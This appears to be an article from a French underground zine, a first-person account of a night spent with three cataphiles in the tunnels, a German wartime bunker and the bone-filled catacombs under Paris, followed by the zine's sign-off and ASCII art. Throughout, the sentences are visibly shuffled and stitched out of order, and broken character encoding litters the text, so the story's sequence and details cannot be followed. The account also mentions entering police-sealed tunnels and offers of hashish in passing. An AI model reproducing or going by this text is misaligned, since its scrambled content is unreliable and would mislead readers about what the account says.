ouvrent des boites de confit de piment...notre entree. Je me contorsionne. je peux continuer.. j' ai pris le Metro le plus au sud a la Porte d'Orleans. Les autres prennent le chemin. Dans les tunnels Le vendredi au soir. se donnent la peine de pratiquer leur anglais. Il saisit son sac � dos. Nous partimes par des rues desertes de Paris. Au milieu de poubelles et de meubles usagers. le rituel. Il mentionne en passant une soute allemande de la deuxieme guerre mondiale. il maintient Emmanuel eveille. Nous les suivons quelques minutes plus tard. je peux consacrer 8 a 9 heures de mon temps. Enfiler les bottes et la tenue dans la rue. Oui. Un pieton passe avec son chien. Notre trou de souris. " c'est un autre monde.. Quelqu'un cultivait des champignons et collectait des pommes de terre ici. puis m' ecarte. Nous conversons tranquillement. c' est un bon debut. Et. puis je chute. mais il nous ignore. A gauche. Hmmm. Ils partent.la sienne.. accompagne d' un camion Citroen.rose. Personne ne peut nous toucher ici. j' ose poser une question stupide: 'Pourquoi le faites-vous?' " pour laver mon cerveau. dans l' obscurite. A present ce sont des tunnels. nous sommes tous fatigues. Terrassements . et Jean-Baptiste. Emmanuel allume et plante une bougie a chaque intersection du tunnel. Nous decidons de nous arreter a cet endroit. Il y a une difference. Stephane est le coupable. Oui.30 ans apr�s .

Mais une lumiere s' approche. et nous saluent dans un anglais casse.musique? Je demande aux autres de s' arreter. comme dans la neige. Ils le sentent et restent distants aussi.Comme preciser et commenter le detail architectural le plus mysterieux." Le leader appelle Emmanuel-fr�re. J' entends quelque chose . Il est temps de partir. et ils commencent eux aussi a l' entendre. Vous devez suivre la personne qui se tient devant vous. Il y a tellement de choses a voir. Aucun son. Heureusement mes guides savent ou ils vont. Avant que je ne puisse repondre. Si je les perd ou que je traine. une marche obligatoire. et ils ne s' arrentent que pour les choses les plus etranges. profonde d' environ 40 cm. Emmanuel verifia que ces touristes ne nous suivaient pas. marchant comme des singes. Les pierres angulaires avec les noms et les dates de rue m'intriguent. "C' est de l' anglais?". Mais mes guides parlent de la construction anarchique du tunnel. Nous ecoutons. mais personnelement. et la police a scelle toutes les entrees a l' interieur de la ville. Les perils C' est une marche. Elle etait vieille et limitee. C' est trop secret.C'est beaucoup plus dur que ce que j' avais imagine. Une fois hors de l' eau. Je n' ai qu' a continuer. il maudit les touristes. ils viennent directement d'Allemagne. Et dans notre prochain tunnel le plafond est irregulier et beaucoup plus bas. J'ai jet� un coup d'oeil sur la carte de leur guide. Vers notre droite sur le mur du tunnel il y a des supports en metal tenant des cables." Emmanuel semble dubitatif. Emmanuel se dirige vers moi. J' essaie de marcher dans les pas de mon predecesseur. Finalement il s' arrete et recupere un morceau de papier au sol. Nous marchons dans l' eau. Ils ne me croient pas. Un eglissade ou erreur de calcul et vous etes empale. C' est un . je ne retrouverai jamais mon chemin arriere. et de ne pas tomber. Nous avons beaucoup de chemin a faire. beaucoup de choix. La postluminescence de sa torche eclaire votre voie. Et ces gars bougent vraiment vite. Ils terminent tranquillement leurs cigarettes dans le silence. Je pourrais etre delaisse ici a tourner pour toujours. Pendant que nous marchons. quatre filles. Cela ne prend pas longtemps pour que je comprenne le probleme. Elles sont belles et changent d'une mani�re extravagante de 1777 � 1890. mais quelqu' un avait trahi l' entree du tunnel. ce labyrinthe devient incroyable. Emmanuel me pousse pour se rapprocher de la source sonore. Nous avoncons de quelques pas. " Elle nous a chassee � 'La Plage' . Emmanuel a cette habitude de regarder et verifier le moindre trou dans les parois. J' essaie de regler ma respiration. " Il n'aime pas cela et il reste assez froid avec eux. Il y a beaucoup de tunnels.il a eu un rabais pour un lot de pots de peinture. Emmanuel me regarde. je prefere ne pas y aventurer mes mains. Mais c' est dur. Silence. Nous nous tapissons. Nous suivons le chemin de fer ci-dessus. " Avez-vous vu la police? " Nope. Apres 20 mn de marche. il est Canadien. et dit " Eh bien. Ces d�butants sont fiers.1789 et 1968. Ils amorcent un sourire. Quatre types. accompagnee de voix eloignees. Et ils montrent les graffitis des periodes revolutionnaires . En fait. le plafond baissa considerablement. C'est trop �trange! Il n' y a pas de SDF ici. il avait deja blanchi un des murs en surface. Je devine qu' il y avait autrefois des bougies et des statues religieuses gardees la.

Alors qu'elle est noire et blanche.. "Bunker . Cet endroit est creuse dans de la roche incertaine et les piliers sont seulement des pierres empil�es les unes sur les autres. Nous rentrons a temps. et il s' ecrase lamentablement sur le dur sol de la caverne. Souvent personne. Ma montre est cachee dans ma poche. Jean Baptiste: " hachish? " Je leur suggere de les garder pour le dessert . Il a passe 4 ans a fusionner des cartes techniques (je ne me demande meme pas pourquoi ou comment il les a obtenues) avec ses propres explorations sous-terraines.plantant des piquets et broyants les pilliers soutenant cette cave en forme de piece. Et. mais je n' ai vraiment aucune envie de savoir quelle heure il est. mais les expositions sont hors chronologie. Ceci me semble assez dangereux. Il a des centaines de dessins. 1777. Stephane est le premier a reussir et etire une bache entre deux piquets. Je demande si c' est frequent qu' ils rencontrent des gens ici.. Et a propos de sa famille? Il a deja emmene deux de ces gamins dans des caves. Stephane montre un trou dans une paroi du tunnel. Puisqu'il est la. hier? Apres une longue ligne droite. Emmanuel nous decrit une rencontre avec un couple plutot etrange et un enfant de 10 ans dans les tunnels l' annee derniere.tract sur l' extreme speleo/cataphile. Nous sommes tous morts de rire. mais par chemin quelque peu illogique. Pourquoi la fait-il? Puisque personne d'autre ne l' a fait. 1850. La carte enti�re est un fichier g�ant de Photoshop qu'il a imprim� en Suisse. Nous sommes dans un musee sous-terrain. Je suis sous Paris avec les trois faire-valoir francais. il l' annote sur un cahier. a chaque coup. Il s' etend soigneusement dans son hamac improvise tout en souriant pendant que les autres continuent et echouent malheureusement. parfois un ou deux voyageurs. Il est temps de se reposer. Emmanuel est . Heureusement ces types s'arpentent. J'offre de l' eau et des barres energetiques. Il y a des milliers de km de souterrain ici. elle montre plus de six niveaux. J' apercois a present un grafiti fluorescent - l' annee derniere. schemas. Je me retire a l'entree. magazines. Ils me regardent curieusement. Aucun d'eux n'a rencontr� la police redoutee du tunnel.) Stephane est un garcon curieux. plus sur. Emmanuel le garde pour sa collection. la semaine derniere. Toutes les fois que nous trouvons quelque chose de nouveau. Pour le diner. Le reve de Stephane est de produire une version en couleur. Nous entrons dans une petite caverne.plus tard". pret a plonger dehors dans le tunnel. Alors un de ses 2 piquets vole soudainement hors du mur. les parties du plafond semblent se desagreger et tomber sur nous. 1941. ou quelque chose d' etrange. laisses par les visiteurs. ce qui la protege des murs erailles. Une fois que nous l'avons eclairee avec des bougies et des lampes mes guides s'embarquent sur un exercice des plus curieux . ils chauffent des boites de confit de canard et sortent du pain et du vin. Ils ont aime. C' est vieux et humide.

chacun observe seul. et je peux observer une trame de metal blanc dans une autre piece. La plupart des vestiges des Nazis sont maintenant partis du bunker. mais il y est deja parti.sceptique a propos de la course-poursuite des allemands. En me prenant . Lors des voyages de camping vous vous asseyez en arriere et ecoutez le vent dans les arbres ou les animaux eloignes. Il n'y a aucun repere de rue. Les autres regardent pour voir si je suivrai. puis ramper vers le bas. et nous sommes tous ecrases. Les lamelles en bois se sont desagregees et se sont dissoutes dans le plancher en pierre. moins obsede. Emmanuel sort du tunnel pour entrer dans un Bunker. Stephane se dirige a une fissure dans le mur. nous sommes detruits. la tourne a 180 degres . Et il y a beaucoup de salles - petites salles. Je lui demande s' il n' est jamais devenu un peu fou. apres avoir jete mon sac a terre. Et j'ai le sentiment que c' est un homme diff�rent ici. Je me lance finalement. Vous vous prenez dans le silence noir. et des portes scellees en metal qui ressemblent a celles d' un sous-marin U2. Il faut grimper. mais il reste des avertissements. Il me confie qu' il a une liberte ici qui n'existe pas en haut. Je n' ose imaginer a quoi elles servaient. La plupart des hommes paniqueraient. Ils discutent. Personne ne nous trouvera. Mais les Allemands l' ont fait. Je suis sur de ne pas passer cette fois. Je sais qu'aucun d'eux ne porte une boussole. Je ne me suis jamais autant senti enterre vivant.ce qui me laisse penser que c' etait un Bunker de transmissions. Je ne sais pas pour combien de temps nous nous asseyons la. Il me repond que ca lui etait deja arrive d' entendre du reggae et de voir des lumieres quand il venait seul. Mais nous retrouvons le sourire a la sortie. et votre coequipier vous pousse a travers. Nous sommes de retour dans les tunnels. Je devine que les gosses ne se rendent jamais ici. Nouveaux Tunnels? Je me depeche pour rattraper mes trois camarades a la prochaine intersection. Les tunnels changent encore d' architecture. La plus legere secousse. Pourquoi est-ce que je fais ca? Je n'ai pas le temps de repondre. Stephane etudie sa carte. Tout le monde est silencieux. Ce stupide sourire que les hommes esquissent lorsqu' ils ont fait quelque chose de viril ensemble. Territoire inconnu! Stephane me sourit. Jean Baptiste est d' un type plus silencieux. Je figure que nous rampons 6 ou 7 m avant la sortie. Personne ne nous entendra. Nous sommes cens�ment sous un lyc�e. Nous sommes censes etre sous un lycee. Je n'ai besoin d'aucune traduction. comme " RAUCHEN VERBOTEN ". J' ai environ 10 cm de jeu de chaque cote. Ces trois-ci sont hyper-joyeux. Clairement. Le Bunker La methode pour entrer est assez simple. Je peux gouter la poussiere. Il y a beaucoup de cables electriques et de conduits montes sur les murs . mais c' est aussi comique: vous passez la tete la premiere. plus jeune que Stephane. Jean Baptiste la saisit. Mes yeux commencent a s' acoutumer. Et il n'y a aucune extremite en vue. Mes nerfs me massacrent. Il y a un type derri�re moi et je dois continuer.le signe international du d�saccord spatial.

mon aventurier . " Mais bien sur ". il l'a entendu. Comme nos cartographes continuent leur travail. Emmanuel se retourne. Aucunes croix faites � partir des lignes des cr�nes ici. Puis. Peut-etre une heure et demie si nous nous deplacons vite. Enfin il consulte la carte une fois de plus. La fatigue me gange. Nous sommes de veritables explorateurs maintenant. Quelque chose de fait avec les 15 genres de pierre de la zone. Les autres sourient. Mon guide est finalement heureux de pouvoir controler. et nous empruntons un detour.. ainsi quand celui-ci s' est presente de lui-meme. Stephane trace une serie de lignes sur sa carte.avec eux. Emmanuel pousse tout a coup un cri aigu. me dit-il. Nous n' allons prendre aucun risque. pour controler les fondations des batiments voisins et l' uniformite de la terre. dans l'obscurit�.passent. Il veut eviter 'La Plage'. J'entends encore cette musique. Les os ont ete empiles pour toujours sur 60 a 80 cm de hauteur dans des tunnels qui vont. Les vraies Catacombes Il n' y eut plus beaucoup d' arrets. Des os sont repandus aux environs. Je regrette de ne pas avoir demande maintenant. une sculpture. C'est l' endroit ou les tares viennent. je me tourne vers Emmanuel pour quelques renseignements. Nous nous precipitons. Les boulots en surface et la colere des epouses fachees reviennent en memoire.nos huit touristes allemands continuant leur chemin. differents.. Au milieu de la salle se trouve un escalier miniature. Il est suspendu au-dessus d' un bassin d' eau totalement claire. puis m'assure que nous sommes seulement a une demi-heure de la fin. Ce sont des hommes en mission. ils ont ete recompenses. Il me dit que personne n' est venu ici depuis tres longtemps. Il semble que quelques-uns prennent leur pied a se jeter sur ce tas d' os. Triste de dire " au revoir " a mon guide. Mais avant que je ne puisse reagir. et me dit de m' approcher. Mais ils pensent a leurs foyers. Emmanuel est silencieux. Meme ces types ont leurs limites. Emmanuel montre peu d'interet a les suivre. Je suis neanmoins tres inquiet.. ils etaient la . Nous observons leur lumi�re disparaitre en bas du mur de tunnel. Ces tunnels semblent. Il me demande si je veux toujours voir les vraies catacombes? Je ne me demonte pas. Cette fois je glisse. Un simple " Salut " et ils continuent leur chemin. Puis soudainement deux jeunes types . impatient. Je suis fatigue. J' ai peur de demander pourquoi. Ils ne sont pas lisses. Les vrais catacombes ne sont pas aussi ordonnees que la version des touristes. mais nous sommes perdus pendant un moment. Je prends appuis avec ma main sur le mur. Quand nous frappons l'eau il tout revient. Tellement de choses a voir. et il y a des signes d' eboulements. de nouveau. je r�ponds. Mais nous pensons a nos foyers. les grimaces aussi. nous nous sommes assis.. Surfer dans le puits de l' humanite. et mes genoux tremblent. Mais Emmanuel est nerveux. vu que les Allemands les ont avertis que les flics rodaient dans ce coin. Ils ont probablement estime qu' il etait trop dangereux de les construire ici. Emmanuel me laisse partir. si peu de temps. Ils nous rejoignent et choisissent Emmanuel pour prendre leur photo. en evitant les metaux. Plusieurs fois Emmanuel regarde sa carte. On se trouvait a present dehors. A chaque intersection. J'ai porte bonheur. Nous zig-zagons pendant un moment puis suivons alors quelques escaliers en pierre antiques vers un autre niveau. Nous continuons sur notre chemin. fiers de moi. Il y a une paire de gants de latex a l'entree. Il me raconte que ce sont des tunnels d' essais. Je sens le sang mais j'incline la tete et nous continuons en fonction. Alors Emmanuel me montre les galeries laterales. Stephane et Jean Baptiste se concentrent pour fournir a Emmanuel les sections adequates de la carte pour faciliter notre retour.d' une vingtaine d' annees . Stephane est si fier de sa nouvelle decouverte. ils partirent aussi rapidement qu'ils etaient apparus. Mais Emmanuel est honorable en un point. Je me cogne la tete.

_. Je suis sur un des premiers trains du nord. Je sais que je suis remonte.�_) Voila pour ce deuxieme numero de notre zine. [ pour vous servir: vatoo] (�`'�. Mes cheveux sont en desordre. notre domaine est mort :( ).��`�. " A plus tard ".�_.�'�`�.�_)`'�. de trafiquants de drogue et de touristes extremes._. en venant sur notre chann (#cryptel / IRCNet). Devant moi maintenant._.13 ( vatoo ( (_�.� �._�. ou en nous envoyant un petit mail a cryptel@altern.��`�.�'��)�. " A la prochaine". mais nous sommes tous les deux fatigues. Et il est un homme de peu de mots.org/cryptel bah oui.�'��) ) Ze End !!! ) 2. des demandes. Des cris. Mais personne n' en prend note._. . que vous lui ferez de la pub.��`�. Nous sourions. et surtout que vous participiez! On insiste bien sur le fait que vous pouvez nous contatcer tres librement.(�`'�.��(_�. ou des textes a nous soumettre.��`�._.altern. .��`�.�'��). en vous exprimant sur le forum de notre site (http://www. J'ai juste passe dix heures sous Paris avec un groupe de cataphiles fous. On espere sincerement qu' il vous aura plu. des sujets. des manifestations etranges. c' est cette email qu' il faut utiliser.de camarade.�'��`'�._.org .��`'�. je suis couvert de salete.�'�(_�. mais alors que le metro accelere je me rappelle ou je suis vraiment. And don' t forget to defonce your head the 31 december!!! . Si vous avez des idees originales d' articles.��`�. mais nous sommes encore sous terre. C'est une merveille qu'ils ne m'arretent pas. Emmanuel conduit en surface comme il voyage en-dessous. Il n' y a juste qu' une foule en plus. premiers banlieusards de matin. que vous lirez le prochain.�(�`'�. inclinons la tete.�_)`�.